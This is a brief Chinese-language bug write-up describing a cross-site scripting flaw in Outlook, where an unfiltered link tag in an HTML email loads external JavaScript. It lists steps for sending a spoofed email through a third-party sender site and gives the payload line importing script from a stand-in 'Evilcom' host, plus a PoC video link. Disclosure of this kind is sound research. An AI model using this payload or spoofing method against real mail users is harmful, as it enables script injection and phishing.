信息來源:nosec
大家好,這是我第一次寫漏洞文章,也是我發(fā)現(xiàn)的第一個Outlook漏洞。
在很多網(wǎng)絡消息服務中,例如Gmail、Outlook、Yahoo等,都允許接受并渲染電子郵件中的HTML內容(Content-Type: text/html),但同時也會進行安全限制,只允許A、H1、img等標簽。
而當我測試Outlook中的安全過濾機制時,發(fā)現(xiàn)link標簽并不會被過濾。這就讓我有機可乘,成功引入了外部JS代碼,實現(xiàn)了彈框。
具體步驟
1.進入網(wǎng)站https://emkei.cz/,這個網(wǎng)站的能直接設置發(fā)送的電子郵件的內容的類型。
2.隨機往郵件主題、發(fā)件人和發(fā)件地址填入字符。
3.往收件人地址填入你需要測試的電子郵件地址。
4.將Content-Type設定為text/html。
5.郵件正文填入<link rel=import href=https://Evilcom/filepayload>,點擊提交。
6.登入收件電子郵箱,點擊查看消息,payload就會成功執(zhí)行!
以下為PoC視頻地址:
https://youtu.be/khsLfQwy1ik